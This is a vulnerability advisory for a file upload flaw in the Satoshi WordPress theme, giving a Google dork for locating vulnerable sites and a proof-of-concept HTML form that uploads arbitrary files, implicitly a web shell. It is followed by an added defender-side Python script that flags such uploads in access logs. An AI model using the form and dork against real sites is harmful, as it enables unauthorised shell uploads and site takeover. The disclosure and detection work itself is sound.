Satoshi Theme - File Upload CSRF



#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type: CSRF
OWASP Top 10: A8: Cross-Site Request Forgery (CSRF)
CWE: CWE-352

Miscellaneous

Submitter: Anonymous
Views: 750
Verified: No
WPVDB ID: 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Success : Success

Shell Path : Here
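
A defender-side check for the request the form above generates, as an added example that is not part of the original advisory: it scans web server access logs for POSTs to the theme's upload-file.php and classifies each by Referer, since a forged cross-site form submission arrives with a foreign Referer or none. The combined log format, the site host blog.example.com, the function name and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Endpoint named in the advisory's proof of concept.
UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"

# Apache/nginx "combined" access log format (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (documentation IP ranges and example hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Dec/2014:10:01:02 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "http://other.example.net/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Dec/2014:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Dec/2014:11:15:40 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "-" "curl/7.38.0"',
    '192.0.2.10 - - [06/Dec/2014:12:00:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.example.com/wp-login.php" "Mozilla/5.0"',
]

def flag_upload_posts(lines, site_host):
    """Return (ip, timestamp, status, reason) for every POST to the upload endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Compare the path only, so a query string does not hide the request.
        if urlsplit(m["uri"]).path != UPLOAD_PATH:
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host is None:
            reason = "no-referer"
        elif ref_host != site_host.lower():
            reason = "cross-origin:" + ref_host
        else:
            reason = "same-origin"
        findings.append((m["ip"], m["ts"], int(m["status"]), reason))
    return findings

if __name__ == "__main__":
    for finding in flag_upload_posts(SAMPLE_LOG, "blog.example.com"):
        print(finding)
```

Any hit is worth reviewing together with the files written to the theme directory around the logged timestamp, because the endpoint accepts uploads regardless of which Referer was sent.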
